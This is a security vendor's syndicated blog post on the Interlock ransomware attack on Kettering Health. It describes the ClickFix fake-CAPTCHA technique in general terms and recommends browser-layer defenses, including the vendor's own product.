Security Bloggers Network 
SBN

Interlock and the Kettering Ransomware Attack: ClickFix’s Persistence

by Mary Yang on June 3, 2025
Healthcare worker in purple scrubs with a stethoscope is looking at a computer, with a red ghost-like figure behind her. Browser screen is super-imposed and shows that she is being attacked.

In healthcare, every minute of downtime isn’t just a technical problem — it’s a patient safety risk.

CNN recently reported that Kettering Health, a major hospital network in Ohio, was hit by a ransomware attack. According to CNN, the Interlock ransomware group claimed responsibility, sending a chilling reminder that healthcare remains a prime target for this particular ransomware gang.

While technical details of the Kettering attack remain scarce, Interlock’s recent history — and the emergence of browser-based attack chains like ClickFix — should put every CISO on high alert. In fact, HHS released a sector-level alert on ClickFix, due to the severity of the attack and how focused attackers were in targeting healthcare organizations. Again, though it is not yet confirmed that this specific exploit was used at Kettering, Interlock has been linked to ClickFix attacks elsewhere.

While Kettering continues to focus on incident response, for those watching across the industry, what’s clear is the growing role of browser-based attacks in ransomware campaigns, and how, in healthcare environments, these kinds of attacks can be life-threatening.

Healthcare Remains a Top Target

Ransomware actors continue to prioritize healthcare organizations as targets because of the high value placed on continuity of care. Timely access to records, imaging, and communication systems is essential for delivering treatment — so when those systems are disrupted, the operational impact is immediate.

Healthcare organizations are uniquely vulnerable to ransomware for several reasons:

  • Dispersed and unmanaged endpoints: Clinicians often use shared workstations, personal laptops, and mobile devices, increasing attack surface.
  • High uptime requirements: Any downtime can delay surgeries, diagnostics, or emergency care — forcing quick, sometimes quiet, ransom payments.
  • Regulatory pressure: Standards and requirements like HIPAA and HITRUST turn data breaches and outages into costly, reportable incidents.
  • High ROI for attackers: Medical data and patient information continues to be the most valuable information sold on the dark web

The stakes are high: In 2024, 67% of healthcare organizations reported a ransomware attack, and research shows that patient care delays increase measurably during major incidents.

Recent examples of healthcare organizations disrupted because of a cyberattack include:

  • Change Healthcare (2024): Payment processor attack rippled across the U.S., delaying claims and payments for weeks.
  • CommonSpirit Health (2022): 600,000+ patient records exposed, care delayed, millions in costs.
  • Universal Health Services (2020): 250 facilities offline, staff forced to revert to paper, patient care disrupted.

As more clinical and operational workflows move into SaaS apps and browser-delivered interfaces, the browser itself is becoming more relevant to healthcare security.

Understanding ClickFix and Browser-Based Tactics

ClickFix is a technique that relies on seemingly legitimate browser interactions — like fake CAPTCHAs or pop-up prompts — to trick users into activating malicious scripts. What makes this approach difficult to detect is that it relies heavily on the browser for clipboard manipulation, with no file download to trigger traditional file-based alerts or network signatures.

Here’s how a ClickFix attack could unfold in a healthcare organization:

  1. A healthcare worker visits a compromised website or clicks a phishing link.
  2. A fake browser prompt appears (e.g., “Please complete this CAPTCHA to continue”).
  3. The user is tricked into copying and running a script (often a PowerShell command), which silently installs malware — sometimes without any download or obvious warning.

SquareX first detailed this technique in 2024 to illustrate a broader challenge: many endpoint and network tools lack visibility into what happens in the browser — including browser extensions, clipboard activity, and in-browser scripting.

🧠 Read our full analysis, with step-by-step details, of the ClickFix attack →

Why Traditional Security Tools Miss Browser Attacks

Most healthcare organizations rely on a familiar stack: Secure Web Gateways (SWG), Endpoint Detection & Response (EDR), and Data Loss Prevention (DLP). But these tools were not designed for the complexity of modern browsers.

What they miss:

  • DOM-level changes (malicious form injections or script manipulations)
  • Malicious browser extensions (often installed by non-technical staff)
  • Clipboard hijacking (stealing credentials or session tokens)
  • Client-side file and data reassembly (a malicious file that is broken into parts to avoid detection and after all pieces are downloaded, it is reassembled into a full payload)
  • WASM-based payloads (running near-native code inside the browser)

Meanwhile, many clinical workflows — from EHRs to claims portals — now run in the browser. In fact, a 2024 survey of the healthcare technology market showed healthcare SaaS expecting to grow nearly 20% by 2028.

This is where Browser Detection & Response (BDR) can complement existing investments — by providing client-side visibility into user behavior and web application interactions that traditional controls can’t see.

Practical Next Steps for Healthcare Security Teams

This is a good moment to reassess browser-layer visibility and controls. Here are some actions that security teams can take today:

  1. Audit browser extension policies and usage, especially for unmanaged or personal devices accessing hospital systems.
  2. Review recent phishing incidents for browser-based interaction patterns — such as prompts, redirects, or spoofed logins.
  3. Test your existing tools against modern client-side attack scenarios. Tools like SquareX’s Web Security Posture Assessment offer a free analysis of your current risk based on real-world threats.
  4. Explore BDR solutions that can provide visibility into browser events, prevent data leakage, and enrich threat investigations — without disrupting clinical workflows.

Final Thoughts

The Kettering Health ransomware incident is yet another reminder of how persistent and creative today’s adversaries have become. While we don’t yet know exactly how the breach occurred, the involvement of a group known to use browser-based techniques raises thoughtful questions for defenders.

Rather than respond with alarm, this is an opportunity to ask:

Do we have the visibility we need at the browser layer?

Are we prepared to detect and respond to client-side threats that bypass legacy controls?

If your answer is no, that’s okay. Modernizing browser security doesn’t require a full overhaul — you may just need to layer in the right visibility where today’s users and workflows operate. Learn more in this Browser Detection and Response white paper.

Interlock and the Kettering Ransomware Attack: ClickFix’s Persistence was originally published in SquareX Labs on Medium, where people are continuing the conversation by highlighting and responding to this story.

*** This is a Security Bloggers Network syndicated blog from SquareX Labs - Medium authored by Mary Yang. Read the original post at: https://labs.sqrx.com/interlock-and-the-kettering-ransomware-attack-clickfixs-persistence-ee00aaf67bff?source=rss----f5a55541436d---4

Mary Yang 0 Comments , , , ,